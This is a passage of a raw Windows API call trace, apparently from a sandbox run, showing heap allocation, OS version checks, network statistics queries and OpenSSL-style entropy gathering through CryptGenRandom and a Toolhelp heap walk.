(hHash=0x3220d98) returned 1 [0146.886] CryptReleaseContext (hProv=0x742b00, dwFlags=0x0) returned 1 [0146.887] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32429c0 | out: hHeap=0x6e0000) returned 1 [0146.887] UuidCreate (in: Uuid=0x391fa48 | out: Uuid=0x391fa48) returned 0x0 [0146.888] UuidToStringA (in: Uuid=0x391fa48, StringUuid=0x391fa40 | out: StringUuid=0x391fa40) returned 0x0 [0146.888] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e708 [0146.888] RpcStringFreeA (in: String=0x391fa40 | out: String=0x391fa40) returned 0x0 [0146.888] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e5b8 | out: hHeap=0x6e0000) returned 1 [0146.888] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e5b8 [0146.888] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25810) returned 0x3a68050 [0146.890] SetFilePointer (in: hFile=0x620, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0146.890] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322e708 | out: hHeap=0x6e0000) returned 1 [0146.890] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1f0) returned 0x32429c0 [0146.890] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e708 [0146.890] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1f0) returned 0x3242bb8 [0146.890] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x58) returned 0x3216cb0 [0146.890] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbe38 [0146.890] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6b98 [0146.890] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc) returned 0x707f70 [0146.890] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x31ee700 [0146.890] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x10) returned 0x700dd0 [0146.890] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc) returned 0x71eae0 [0146.890] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6be0 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc) returned 0x3a65068 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x31ee480 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x10) returned 0x3a65080 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc) returned 0x3a65098 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc) returned 0x3a650b0 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c28 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc) returned 0x3a650c8 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc) returned 0x3a650e0 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc) returned 0x3a650f8 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc) returned 0x3a65110 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x24) returned 0x322d9e8 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x158) returned 0x711b30 [0146.891] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x711b30, Size=0x218) returned 0x3219ec8 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x558) returned 0x321a0e8 [0146.891] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a650e0 | out: hHeap=0x6e0000) returned 1 [0146.891] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65110 | out: hHeap=0x6e0000) returned 1 [0146.891] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a650f8 | out: hHeap=0x6e0000) returned 1 [0146.891] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322d9e8 | out: hHeap=0x6e0000) returned 1 [0146.891] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x321a0e8 | out: hHeap=0x6e0000) returned 1 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc) returned 0x3a650f8 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x8) returned 0x31aeee0 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x10) returned 0x3a65110 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x31ee440 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x9) returned 0x3a650e0 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x8) returned 0x31aeed0 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x10e) returned 0x31d1be8 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32409b0 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x58) returned 0x3216d10 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x31ee920 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x104) returned 0x3201db8 [0146.891] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x14) returned 0x31ee8e0 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x4) returned 0x31aeef0 [0146.892] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31d1be8 | out: hHeap=0x6e0000) returned 1 [0146.892] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a65110 | out: hHeap=0x6e0000) returned 1 [0146.892] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31aeed0 | out: hHeap=0x6e0000) returned 1 [0146.892] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a650e0 | out: hHeap=0x6e0000) returned 1 [0146.892] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31ee440 | out: hHeap=0x6e0000) returned 1 [0146.892] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31aeee0 | out: hHeap=0x6e0000) returned 1 [0146.892] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3a650f8 | out: hHeap=0x6e0000) returned 1 [0146.892] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32409b0 | out: hHeap=0x6e0000) returned 1 [0146.892] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3216cb0 | out: hHeap=0x6e0000) returned 1 [0146.892] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3219ec8 | out: hHeap=0x6e0000) returned 1 [0146.892] GetCurrentThreadId () returned 0x35c [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x190) returned 0x31b0b70 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bc0a8 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6c70 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc) returned 0x3a650f8 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x100) returned 0x3a66068 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x82) returned 0x744cc8 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2c) returned 0x322e5f0 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x80) returned 0x742b00 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x148) returned 0x31d0ab8 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x4) returned 0x31aeee0 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x4) returned 0x31aeed0 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x100) returned 0x3a66170 [0146.892] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0146.892] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0146.892] GetCurrentThreadId () returned 0x35c [0146.892] GetVersionExA (in: lpVersionInformation=0x391f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0x391f3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0x391f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0146.892] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x77010000 [0146.893] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75d20000 [0146.893] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x74d50000 [0146.909] GetProcAddress (hModule=0x74d50000, lpProcName="NetStatisticsGet") returned 0x74d5644f [0146.909] GetProcAddress (hModule=0x74d50000, lpProcName="NetApiBufferFree") returned 0x74d813d2 [0146.909] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0x391f02c | out: Buffer=0x391f02c) returned 0x0 [0146.911] GetCurrentThreadId () returned 0x35c [0146.911] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0146.911] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0146.911] NetApiBufferFree (Buffer=0x3224f48) returned 0x0 [0146.911] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0x391f02c | out: Buffer=0x391f02c) returned 0x0 [0146.922] GetCurrentThreadId () returned 0x35c [0146.922] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0146.922] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0146.922] NetApiBufferFree (Buffer=0x3216cb0) returned 0x0 [0146.922] FreeLibrary (hLibModule=0x74d50000) returned 1 [0146.924] GetProcAddress (hModule=0x77010000, lpProcName="CryptAcquireContextW") returned 0x7701df14 [0146.924] GetProcAddress (hModule=0x77010000, lpProcName="CryptGenRandom") returned 0x7701dfc8 [0146.924] GetProcAddress (hModule=0x77010000, lpProcName="CryptReleaseContext") returned 0x7701e124 [0146.924] CryptAcquireContextW (in: phProv=0x391f018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x391f018*=0x742a78) returned 1 [0146.925] CryptGenRandom (in: hProv=0x742a78, dwLen=0x40, pbBuffer=0x391f464 | out: pbBuffer=0x391f464) returned 1 [0146.925] GetCurrentThreadId () returned 0x35c [0146.925] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0146.925] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0146.925] CryptReleaseContext (hProv=0x742a78, dwFlags=0x0) returned 1 [0146.925] CryptAcquireContextW (in: phProv=0x391f018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0x391f018*=0x742a78) returned 0 [0146.925] FreeLibrary (hLibModule=0x77010000) returned 1 [0146.925] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0146.925] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0146.925] GetDesktopWindow () returned 0x10010 [0146.925] GetProcessWindowStation () returned 0x48 [0146.925] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0x391efa0 | out: pvInfo=0x0, lpnLengthNeeded=0x391efa0) returned 0 [0146.926] GetLastError () returned 0x7a [0146.926] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x391ef80, nLength=0x10, lpnLengthNeeded=0x391efa0 | out: pvInfo=0x391ef80, lpnLengthNeeded=0x391efa0) returned 1 [0146.926] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x773f0000 [0146.926] GetProcAddress (hModule=0x773f0000, lpProcName="GetForegroundWindow") returned 0x77412320 [0146.926] GetProcAddress (hModule=0x773f0000, lpProcName="GetCursorInfo") returned 0x7746812f [0146.926] GetProcAddress (hModule=0x773f0000, lpProcName="GetQueueStatus") returned 0x77413924 [0146.926] GetForegroundWindow () returned 0x10058 [0146.926] GetCurrentThreadId () returned 0x35c [0146.926] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0146.926] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0146.926] GetCursorInfo (in: pci=0x391f450 | out: pci=0x391f450) returned 1 [0146.927] GetQueueStatus (flags=0xbf) returned 0x0 [0146.927] GetCurrentThreadId () returned 0x35c [0146.927] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0146.927] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0146.927] FreeLibrary (hLibModule=0x773f0000) returned 1 [0146.927] GetProcAddress (hModule=0x75d20000, lpProcName="CreateToolhelp32Snapshot") returned 0x75d5735f [0146.927] GetProcAddress (hModule=0x75d20000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0146.927] GetProcAddress (hModule=0x75d20000, lpProcName="Heap32First") returned 0x75db5763 [0146.927] GetProcAddress (hModule=0x75d20000, lpProcName="Heap32Next") returned 0x75db594e [0146.928] GetProcAddress (hModule=0x75d20000, lpProcName="Heap32ListFirst") returned 0x75db5621 [0146.928] GetProcAddress (hModule=0x75d20000, lpProcName="Heap32ListNext") returned 0x75db56cb [0146.928] GetProcAddress (hModule=0x75d20000, lpProcName="Process32First") returned 0x75d58ae7 [0146.928] GetProcAddress (hModule=0x75d20000, lpProcName="Process32Next") returned 0x75d588a4 [0146.928] GetProcAddress (hModule=0x75d20000, lpProcName="Thread32First") returned 0x75db5b93 [0146.928] GetProcAddress (hModule=0x75d20000, lpProcName="Thread32Next") returned 0x75db5c3f [0146.928] GetProcAddress (hModule=0x75d20000, lpProcName="Module32First") returned 0x75db5cd9 [0146.929] GetProcAddress (hModule=0x75d20000, lpProcName="Module32Next") returned 0x75db5dc2 [0146.929] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x630 [0146.943] GetTickCount () returned 0x1134ab7 [0146.943] Heap32ListFirst (hSnapshot=0x630, lphl=0x391f454) returned 1 [0146.943] GetCurrentThreadId () returned 0x35c [0146.943] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0146.943] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0146.943] Heap32First (lphe=0x391efc0, th32ProcessID=0x4d4, th32HeapID=0x6e0000) returned 1 [0146.960] GetCurrentThreadId () returned 0x35c [0146.960] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0146.960] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0146.960] Heap32Next (lphe=0x391efc0) returned 1 [0146.980] GetTickCount () returned 0x1134ae6 [0146.980] GetCurrentThreadId () returned 0x35c [0146.980] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0146.980] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0146.980] Heap32Next (lphe=0x391efc0) returned 1 [0147.000] GetTickCount () returned 0x1134af5 [0147.000] GetCurrentThreadId () returned 0x35c [0147.000] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.001] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.001] Heap32Next (lphe=0x391efc0) returned 1 [0147.016] GetTickCount () returned 0x1134b05 [0147.016] GetCurrentThreadId () returned 0x35c [0147.016] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.016] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.016] Heap32Next (lphe=0x391efc0) returned 1 [0147.044] GetTickCount () returned 0x1134b24 [0147.044] GetCurrentThreadId () returned 0x35c [0147.044] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.044] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.044] Heap32Next (lphe=0x391efc0) returned 1 [0147.059] GetTickCount () returned 0x1134b34 [0147.059] GetCurrentThreadId () returned 0x35c [0147.059] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.059] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.059] Heap32Next (lphe=0x391efc0) returned 1 [0147.075] GetTickCount () returned 0x1134b43 [0147.075] GetCurrentThreadId () returned 0x35c [0147.075] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.075] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.075] Heap32Next (lphe=0x391efc0) returned 1 [0147.090] GetTickCount () returned 0x1134b53 [0147.090] GetCurrentThreadId () returned 0x35c [0147.090] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.090] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.090] Heap32Next (lphe=0x391efc0) returned 1 [0147.105] GetTickCount () returned 0x1134b63 [0147.105] GetCurrentThreadId () returned 0x35c [0147.105] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.105] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.105] Heap32Next (lphe=0x391efc0) returned 1 [0147.120] GetTickCount () returned 0x1134b72 [0147.120] GetCurrentThreadId () returned 0x35c [0147.120] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.120] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.120] Heap32Next (lphe=0x391efc0) returned 1 [0147.135] GetTickCount () returned 0x1134b72 [0147.135] GetCurrentThreadId () returned 0x35c [0147.135] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.135] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.135] Heap32Next (lphe=0x391efc0) returned 1 [0147.149] GetTickCount () returned 0x1134b82 [0147.149] GetCurrentThreadId () returned 0x35c [0147.149] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.149] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.150] Heap32Next (lphe=0x391efc0) returned 1 [0147.164] GetTickCount () returned 0x1134b91 [0147.164] GetCurrentThreadId () returned 0x35c [0147.164] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.164] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.164] Heap32Next (lphe=0x391efc0) returned 1 [0147.179] GetTickCount () returned 0x1134ba1 [0147.179] GetCurrentThreadId () returned 0x35c [0147.179] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.179] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.179] Heap32Next (lphe=0x391efc0) returned 1 [0147.194] GetTickCount () returned 0x1134bb1 [0147.194] GetCurrentThreadId () returned 0x35c [0147.194] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.194] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.194] Heap32Next (lphe=0x391efc0) returned 1 [0147.208] GetTickCount () returned 0x1134bc0 [0147.208] GetCurrentThreadId () returned 0x35c [0147.208] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.208] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.208] Heap32Next (lphe=0x391efc0) returned 1 [0147.224] GetTickCount () returned 0x1134bd0 [0147.224] GetCurrentThreadId () returned 0x35c [0147.224] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.224] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.224] Heap32Next (lphe=0x391efc0) returned 1 [0147.238] GetTickCount () returned 0x1134bdf [0147.238] GetCurrentThreadId () returned 0x35c [0147.238] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.238] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.238] Heap32Next (lphe=0x391efc0) returned 1 [0147.253] GetTickCount () returned 0x1134bef [0147.253] GetCurrentThreadId () returned 0x35c [0147.253] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.253] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.253] Heap32Next (lphe=0x391efc0) returned 1 [0147.270] GetTickCount () returned 0x1134bff [0147.270] GetCurrentThreadId () returned 0x35c [0147.270] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.270] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.270] Heap32Next (lphe=0x391efc0) returned 1 [0147.285] GetTickCount () returned 0x1134c0e [0147.285] GetCurrentThreadId () returned 0x35c [0147.285] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.285] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.285] Heap32Next (lphe=0x391efc0) returned 1 [0147.300] GetTickCount () returned 0x1134c1e [0147.300] GetCurrentThreadId () returned 0x35c [0147.300] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.300] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.300] Heap32Next (lphe=0x391efc0) returned 1 [0147.315] GetTickCount () returned 0x1134c2d [0147.315] GetCurrentThreadId () returned 0x35c [0147.315] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.315] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.315] Heap32Next (lphe=0x391efc0) returned 1 [0147.330] GetTickCount () returned 0x1134c3d [0147.330] GetCurrentThreadId () returned 0x35c [0147.330] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.330] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.330] Heap32Next (lphe=0x391efc0) returned 1 [0147.345] GetTickCount () returned 0x1134c4d [0147.345] GetCurrentThreadId () returned 0x35c [0147.345] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.345] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.345] Heap32Next (lphe=0x391efc0) returned 1 [0147.360] GetTickCount () returned 0x1134c5c [0147.360] GetCurrentThreadId () returned 0x35c [0147.360] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.360] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.360] Heap32Next (lphe=0x391efc0) returned 1 [0147.375] GetTickCount () returned 0x1134c6c [0147.375] GetCurrentThreadId () returned 0x35c [0147.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.375] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.375] Heap32Next (lphe=0x391efc0) returned 1 [0147.389] GetTickCount () returned 0x1134c7b [0147.389] GetCurrentThreadId () returned 0x35c [0147.389] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.389] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.389] Heap32Next (lphe=0x391efc0) returned 1 [0147.405] GetTickCount () returned 0x1134c8b [0147.405] GetCurrentThreadId () returned 0x35c [0147.405] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.405] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.405] Heap32Next (lphe=0x391efc0) returned 1 [0147.420] GetTickCount () returned 0x1134c9b [0147.420] GetCurrentThreadId () returned 0x35c [0147.420] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.420] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.420] Heap32Next (lphe=0x391efc0) returned 1 [0147.434] GetTickCount () returned 0x1134caa [0147.434] GetCurrentThreadId () returned 0x35c [0147.434] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.434] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.434] Heap32Next (lphe=0x391efc0) returned 1 [0147.450] GetTickCount () returned 0x1134cba [0147.450] GetCurrentThreadId () returned 0x35c [0147.450] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.450] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.450] Heap32Next (lphe=0x391efc0) returned 1 [0147.464] GetTickCount () returned 0x1134cc9 [0147.464] GetCurrentThreadId () returned 0x35c [0147.464] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.464] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bea78 | out: hHeap=0x6e0000) returned 1 [0147.464] Heap32Next (lphe=0x391efc0) returned 1 [0147.479] GetTickCount () returned 0x1134cd9 [0147.479] GetCurrentThreadId () returned 0x35c [0147.479] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x64) returned 0x7bea78 [0147.479] HeapFree 